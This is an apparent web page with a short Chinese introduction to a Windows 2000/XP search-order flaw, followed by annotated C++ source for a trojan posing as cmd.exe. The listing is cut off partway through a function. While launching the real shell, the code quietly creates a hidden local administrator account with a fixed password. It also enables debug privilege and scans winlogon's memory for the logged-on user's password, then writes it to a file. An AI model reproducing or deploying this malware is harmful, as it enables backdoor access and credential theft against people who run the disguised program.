

📁 你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录
// cmd.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <stdlib.h>
#include <time.h>


// PasswordReminder.cpp
//
// This code is licensed under the terms of the GPL (gnu public license).
//

#include <windows.h>
#include <tchar.h>
#include <stdio.h>

// Local copy of the native UNICODE_STRING layout so the file does not depend
// on the DDK headers. It is the second argument type of
// RtlRunDecodeUnicodeString (see the function-pointer typedefs below) and is
// embedded in ENCODED_PASSWORD_INFO.
typedef struct _UNICODE_STRING 
{
	USHORT Length;
	USHORT MaximumLength;
	PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

// Undocumented NT structures. These are the author's reconstructions, not
// layouts taken from public headers, so the field names are interpretations.

// One entry of the buffer returned by NtQuerySystemInformation with
// information class 0x10 (SystemHandleInformation), as FindWinLogon reads it:
// it walks the entries and keeps those whose HandleType == 5 (process).
// NOTE(review): the publicly documented SYSTEM_HANDLE_TABLE_ENTRY_INFO has the
// same 16-byte size but orders its fields differently (PID first, GrantedAccess
// last); treat these names as the author's guess rather than a reference.
typedef struct _QUERY_SYSTEM_INFORMATION
{
	DWORD GrantedAccess;
	DWORD PID;
	WORD HandleType;
	WORD HandleId;
	DWORD Handle;
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;
// Header that FindWinLogon expects at offset 0x60 of the buffer filled by
// RtlQueryProcessDebugInformation(pid, 1, buffer): Count is the number of
// PROCESS_INFO records that immediately follow it. The two other fields are
// unknown to the author and are never read here.
typedef struct _PROCESS_INFO_HEADER
{
	DWORD Count;
	DWORD Unk04;
	DWORD Unk08;
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;
// One record following PROCESS_INFO_HEADER in the debug buffer. From the
// field set (load address, size, a 0x108-byte name) this looks like a
// loaded-module entry of the queried process; how FindWinLogon matches on it
// is on page 2 of this listing and not visible here.
typedef struct _PROCESS_INFO
{
	DWORD LoadAddress;
	DWORD Size;
	DWORD Unk08;
	DWORD Enumerator;
	DWORD Unk10;
	char Name [0x108];
} PROCESS_INFO, *PPROCESS_INFO;
// Author's layout of the block in winlogon's address space that holds the
// run-encoded logon password. HashByte matches the BYTE argument that
// RtlRunDecodeUnicodeString takes, and EncodedPassword is the string it
// decodes. Nothing on this page reads the struct; it is presumably consumed by
// LocatePasswordPage*/DisplayPassword* on page 2 (not visible here).
typedef struct _ENCODED_PASSWORD_INFO
{
	DWORD HashByte;
	DWORD Unk04;
	DWORD Unk08;
	DWORD Unk0C;
	FILETIME LoggedOn;
	DWORD Unk18;
	DWORD Unk1C;
	DWORD Unk20;
	DWORD Unk24;
	DWORD Unk28;
	UNICODE_STRING EncodedPassword;
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;

// Function-pointer types for the ntdll exports that GetPasswd resolves at run
// time with GetProcAddress (none of them are in the import table, so a static
// import scan of the binary will not show them).
// NtQuerySystemInformation(InfoClass, Buffer, BufferLength, ReturnLength)
typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION)  (DWORD, PVOID, DWORD, PDWORD);
// RtlCreateQueryDebugBuffer(size, eventPair) -> debug buffer, see FindWinLogon
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);
// RtlQueryProcessDebugInformation(pid, flags, buffer) -> NTSTATUS (0 == success)
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);
// RtlRunDecodeUnicodeString(hashByte, string): presumably decodes in place;
// the caller (DisplayPassword*) is on page 2 and not visible here.
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING)  (BYTE, PUNICODE_STRING);

// Private Prototypes
// AddUser, GetPasswd, IsWinNT, IsWin2K, AddDebugPrivilege and the start of
// FindWinLogon are defined on this page; LocatePasswordPage*, DisplayPassword*
// and GetFile are on page 2 of the listing.
int AddUser();
int GetPasswd();
BOOL IsWinNT (void);
BOOL IsWin2K (void);
BOOL AddDebugPrivilege (void);
DWORD FindWinLogon (void);
BOOL LocatePasswordPageWinNT (DWORD, PDWORD);
BOOL LocatePasswordPageWin2K (DWORD, PDWORD);
void DisplayPasswordWinNT (void);
void DisplayPasswordWin2K (void);
BOOL GetFile();

// Global Variables

// Resolved ntdll entry points; filled in by GetPasswd, used by FindWinLogon
// (and presumably by the page-2 functions). They are never NULL-checked.
PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation;
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer;
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString;

// Results of the winlogon memory scan. PasswordLength is written through the
// PDWORD argument of LocatePasswordPage*; the pointers and HashByte are only
// assigned on page 2.
DWORD PasswordLength = 0;
PVOID RealPasswordP = NULL;
PVOID PasswordP = NULL;
DWORD HashByte = 0;
// Filled from the USERNAME / USERDOMAIN environment variables (0x400 wide
// chars each) and written into the output file next to the password.
wchar_t UserName [0x400];
wchar_t UserDomain [0x400];

// Save to File
// Output file handle and path; szPassPath is set by GetFile() (page 2) and
// opened in append mode by GetPasswd.
FILE *fp;
char szPassPath[MAX_PATH*2]={0};

// Entry point of a cmd.exe impostor.
//
// It launches the real cmd.exe (resolved under GetSystemDirectory) with the
// caller's arguments through system(), so whoever started "cmd" gets the shell
// they expected, while GetPasswd() runs on a background thread creating a
// local administrator account and harvesting the logon password. The file is
// presumably meant to be dropped where a launcher resolves "cmd" to it before
// the real one (the page description refers to a root-directory search-order
// issue).
//
// NOTE(review) — observations, not fixes:
//   - GetPasswd is an int() function cast to LPTHREAD_START_ROUTINE; the
//     thread handle is never waited on or closed. system() blocking on
//     cmd.exe is what gives the thread time to run.
//   - strstr finds the FIRST backslash of argv[0], so everything after it
//     (including any intermediate directory names) is appended to the system
//     directory, which already ends in "\".
//   - argv[1] is appended directly after the program path with no separator;
//     every argument gets a trailing space.
//   - szCMDPath is MAX_PATH bytes and every strcat is unbounded, so long
//     argv[0]/arguments overflow the stack buffer.
int main(int argc, char* argv[])
{
	// Get Currently User Password
	// Background payload (account creation + password scrape), see GetPasswd.
	DWORD dwThreadID;
    CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)GetPasswd,NULL,0,&dwThreadID);

	// exec cmd.exe
	// Build "<system dir>\" + <argv[0] from its first backslash, or all of it>
	// + <remaining arguments>, then hand it to system().
	char szCMDPath[MAX_PATH]={0};

	GetSystemDirectory(szCMDPath, MAX_PATH);
	strcat(szCMDPath, "\\");
	
	char *p;

	if((p=strstr(argv[0],"\\")) != NULL)
	{
		strcat(szCMDPath, p);
	}
	else
	{
		strcat(szCMDPath, argv[0]);
	}

	if(argc > 1)
		for(int i=1; i<argc; i++)
		{
			strcat(szCMDPath, argv[i]);
			strcat(szCMDPath, " ");
		}
	
	
	// Runs the real shell through the command interpreter; blocks until it exits.
	system(szCMDPath);
	
	return 0;
}

// Unused stub: does no work and always reports 0. The account creation this
// name suggests actually happens inside GetPasswd via "net user".
int AddUser()
{
	return (0);
}

// Background payload, started on its own thread by main().
//
// Side effects, in order:
//   1. Runs "net user ISUR_IWAM wwwcnhonkercom /add" and then
//      "net localgroup administrators ISUR_IWAM /add" with a hidden window,
//      i.e. creates a local administrator backdoor account (the name is
//      presumably chosen to resemble the IIS IUSR_/IWAM_ service accounts).
//      Both run unconditionally, before any OS or privilege check.
//   2. Enables SeDebugPrivilege, resolves undocumented ntdll exports, finds
//      winlogon via FindWinLogon and scans its memory for the run-encoded
//      password of the current USERNAME / USERDOMAIN.
//   3. Records the result: the empty-password case is appended to the file
//      chosen by GetFile() right here; the non-empty case goes through
//      DisplayPasswordWin2K/WinNT (page 2, not visible).
//
// Always returns 0. Every failure path is silent; the original diagnostics
// are left commented out below.
int GetPasswd()
{
//	printf ("\n\tPasswordReminder\n\n");

	PROCESS_INFORMATION ProcessInformation;
	STARTUPINFO si;
    HANDLE ProcessHandle = NULL;   // never used

	// Initialize process startup info
	// NOTE(review): only these fields are set; hStdError and the remaining
	// STARTUPINFO members stay uninitialized although STARTF_USESTDHANDLES
	// is requested. Null std handles + SW_HIDE keep the net.exe windows
	// from showing.
    si.cb = sizeof(STARTUPINFO);
    si.lpReserved = NULL;
    si.lpTitle = NULL;
    si.lpDesktop = NULL;
    si.dwX = si.dwY = si.dwXSize = si.dwYSize = 0L;
    si.wShowWindow = SW_HIDE;
    si.lpReserved2 = NULL;
    si.cbReserved2 = 0;
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.hStdInput  = NULL;
    si.hStdOutput = NULL;

	// Backdoor account creation (detection value: "net user" spawned from a
	// process named cmd with this fixed username/password).
	if(CreateProcess(NULL, "net user ISUR_IWAM wwwcnhonkercom /add", NULL, NULL, TRUE, 0, NULL, NULL, &si, &ProcessInformation))
	{
        Sleep(1000);
		// NOTE(review): this passes the *thread* handle to TerminateProcess,
		// and neither hProcess nor hThread is ever closed.
		TerminateProcess(ProcessInformation.hThread, 0);
    }

	if(CreateProcess(NULL, "net localgroup administrators ISUR_IWAM /add", NULL, NULL, TRUE, 0, NULL, NULL, &si, &ProcessInformation))
	{
        Sleep(1000);
		TerminateProcess(ProcessInformation.hThread, 0);
    }

	// Bail out on non-NT platforms. IsWin2K implies IsWinNT, so the second
	// test can never change the outcome.
	if ((!IsWinNT ())
			&&
		(!IsWin2K ()))
	{
//		printf ("Windows NT or Windows 2000 are required.\n");
		return (0);
	}

	// Add debug privilege to PasswordReminder - 
	// this is needed for the search for Winlogon.
	if (!AddDebugPrivilege ())
	{
//		printf ("Unable to add debug privilege.\n");
		return (0);
	}
//	printf ("The debug privilege has been added to PasswordReminder.\n");

	// Resolve the undocumented ntdll entry points into the globals.
	// NOTE(review): hNtDll and every GetProcAddress result are unchecked.
	HINSTANCE hNtDll = 
		LoadLibrary 
			("NTDLL.DLL");
	pfnNtQuerySystemInformation =
		(PFNNTQUERYSYSTEMINFORMATION) GetProcAddress 
			(hNtDll, 
			"NtQuerySystemInformation");
	pfnRtlCreateQueryDebugBuffer =
		(PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress 
			(hNtDll, 
			"RtlCreateQueryDebugBuffer");
	pfnRtlQueryProcessDebugInformation =
		(PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress 
			(hNtDll, 
			"RtlQueryProcessDebugInformation");
	pfnRtlDestroyQueryDebugBuffer =
		(PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress 
			(hNtDll, 
			"RtlDestroyQueryDebugBuffer");
	pfnRtlRunDecodeUnicodeString =
		(PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress 
			(hNtDll, 
			"RtlRunDecodeUnicodeString");

	// Locate WinLogon's PID - need debug privilege and admin rights.
	DWORD WinLogonPID =
		FindWinLogon ();
	if (WinLogonPID == 0)
	{
//		printf ("PasswordReminder is unable to find WinLogon or you are using NWGINA.DLL.\n");
//		printf ("PasswordReminder is unable to find the password in memory.\n");
		FreeLibrary 
			(hNtDll);
		return (0);
	}
//	printf	("The WinLogon process id is %d (0x%8.8lx).\n", WinLogonPID, WinLogonPID);

	// Set values to check memory block against.
	// The current user's name and domain, taken from the environment of this
	// process, are what the memory scan matches on (and what gets written to
	// the output file).
	memset 
		(UserName, 
		0, 
		sizeof (UserName));
	memset 
		(UserDomain, 
		0, 
		sizeof (UserDomain));
	GetEnvironmentVariableW 
		(L"USERNAME", 
		UserName, 
		0x400);
	GetEnvironmentVariableW 
		(L"USERDOMAIN", 
		UserDomain, 
		0x400);

	// Locate the block of memory containing 
	// the password in WinLogon's memory space.
	// Both locators are on page 2; they report the length through
	// &PasswordLength and return whether the block was found at all.
	BOOL FoundPasswordPage = FALSE;
	if (IsWin2K ())
		FoundPasswordPage =
			LocatePasswordPageWin2K 
				(WinLogonPID, 
				&PasswordLength);
	else
		FoundPasswordPage =
			LocatePasswordPageWinNT 
				(WinLogonPID, 
				&PasswordLength);

	if (FoundPasswordPage)
	{
		if (PasswordLength == 0)
		{
			// Empty password: record domain/user with a "(NULL)" marker in the
			// file GetFile() selects (szPassPath), appending to any prior runs.
			// The format mixes "\r\n" and "\n" line endings.
			if(GetFile())
			{
				if((fp=fopen(szPassPath, "a"))!=NULL)
				{
					fprintf(
						fp,
						"DomainName : %S\r\nUserName   : %S\nPassWord   : (NULL) no Password\r\n",
						UserDomain, 
						UserName);
					fclose(fp);
				}
			}
		}
		else
		{
/*			printf 
				("The encoded password is found at 0x%8.8lx and has a length of %d.\n", 
				RealPasswordP, 
				PasswordLength);
*/

			// Decode the password string.
			// Decoding and writing happen in the page-2 DisplayPassword* routines.
			if (IsWin2K ())
				DisplayPasswordWin2K ();
			else
				DisplayPasswordWinNT ();
		}
	}
/*	else
		printf 
			("PasswordReminder is unable to find the password in memory.\n");
*/
	
	FreeLibrary 
		(hNtDll);
	return (0);
} // GetPasswd

// Return TRUE when GetVersionEx reports the Windows NT platform family
// (VER_PLATFORM_WIN32_NT); FALSE on other platforms or if the query fails.
BOOL IsWinNT (void)
{
	OSVERSIONINFO osvi;
	osvi.dwOSVersionInfoSize = sizeof (osvi);
	if (!GetVersionEx (&osvi))
		return FALSE;
	return osvi.dwPlatformId == VER_PLATFORM_WIN32_NT;
}

// Return TRUE when the running OS is NT-family with major version 5. The
// original author treats that as "Windows 2000"; the same test also matches
// the later 5.x releases (XP, Server 2003). FALSE if GetVersionEx fails.
BOOL IsWin2K (void)
{
	OSVERSIONINFO osvi;
	osvi.dwOSVersionInfoSize = sizeof (osvi);
	if (!GetVersionEx (&osvi))
		return FALSE;
	if (osvi.dwPlatformId != VER_PLATFORM_WIN32_NT)
		return FALSE;
	return osvi.dwMajorVersion == 5;
}

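// Enable SeDebugPrivilege in the current process token. GetPasswd needs it so
// that FindWinLogon / the winlogon memory scan can open another user's
// process.
//
// Returns TRUE only when the privilege is actually enabled now. Two defects of
// the original are fixed here: AdjustTokenPrivileges returns TRUE even when
// the token does not hold the privilege at all (it only reports that via
// GetLastError() == ERROR_NOT_ALL_ASSIGNED), so a non-admin caller used to
// get a false success; and the token handle was never closed.
BOOL 
	AddDebugPrivilege 
		(void)
{
	HANDLE Token = NULL;
	TOKEN_PRIVILEGES TokenPrivileges;
	TOKEN_PRIVILEGES PreviousState;
	DWORD ReturnLength = 0;
	BOOL Enabled = FALSE;

	if (!OpenProcessToken 
			(GetCurrentProcess (), 
			TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, 
			&Token))
		return (FALSE);

	if (LookupPrivilegeValue 
			(NULL, 
			"SeDebugPrivilege", 
			&TokenPrivileges.Privileges[0].Luid))
	{
		TokenPrivileges.PrivilegeCount = 1;
		TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
		Enabled = AdjustTokenPrivileges
					(Token,
					FALSE,
					&TokenPrivileges,
					sizeof (TOKEN_PRIVILEGES),
					&PreviousState,
					&ReturnLength);
		// A TRUE return with ERROR_NOT_ALL_ASSIGNED means nothing was enabled.
		if (Enabled && GetLastError () == ERROR_NOT_ALL_ASSIGNED)
			Enabled = FALSE;
	}

	CloseHandle (Token);
	return (Enabled);
} // AddDebugPrivilege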

// Note that the following code eliminates the need
// for PSAPI.DLL as part of the executable.
DWORD 
	FindWinLogon 
		(void)
{
#define INITIAL_ALLOCATION 0x100
	DWORD rc = 0;
	DWORD SizeNeeded = 0;
	PVOID InfoP = 
		HeapAlloc 
			(GetProcessHeap (),
			HEAP_ZERO_MEMORY,
			INITIAL_ALLOCATION);
	// Find how much memory is required.
	pfnNtQuerySystemInformation 
		(0x10, 
		InfoP, 
		INITIAL_ALLOCATION, 
		&SizeNeeded);
	HeapFree 
		(GetProcessHeap (),
		0,
		InfoP);
	// Now, allocate the proper amount of memory.
	InfoP = 
		HeapAlloc 
			(GetProcessHeap (),
			HEAP_ZERO_MEMORY,
			SizeNeeded);
	DWORD SizeWritten = SizeNeeded;
	if (pfnNtQuerySystemInformation 
			(0x10, 
			InfoP, 
			SizeNeeded, 
			&SizeWritten))
	{
		HeapFree 
			(GetProcessHeap (),
			0,
			InfoP);
		return (0);
	}
	DWORD NumHandles = SizeWritten / sizeof (QUERY_SYSTEM_INFORMATION);
	if (NumHandles == 0)
	{
		HeapFree 
			(GetProcessHeap (),
			0,
			InfoP);
		return (0);
	}
	PQUERY_SYSTEM_INFORMATION QuerySystemInformationP =
		(PQUERY_SYSTEM_INFORMATION) InfoP;
	DWORD i;
	for (i = 1; i <= NumHandles; i++)
	{
		// "5" is the value of a kernel object type process.
		if (QuerySystemInformationP->HandleType == 5)
		{
			PVOID DebugBufferP =
				pfnRtlCreateQueryDebugBuffer 
					(0, 
					0);
			if (pfnRtlQueryProcessDebugInformation 
					(QuerySystemInformationP->PID,
					1,
					DebugBufferP) == 0)
			{
				PPROCESS_INFO_HEADER ProcessInfoHeaderP =
					(PPROCESS_INFO_HEADER) ((DWORD) DebugBufferP + 0x60);
				DWORD Count =
					ProcessInfoHeaderP->Count;
				PPROCESS_INFO ProcessInfoP =
					(PPROCESS_INFO) ((DWORD) ProcessInfoHeaderP + sizeof (PROCESS_INFO_HEADER));
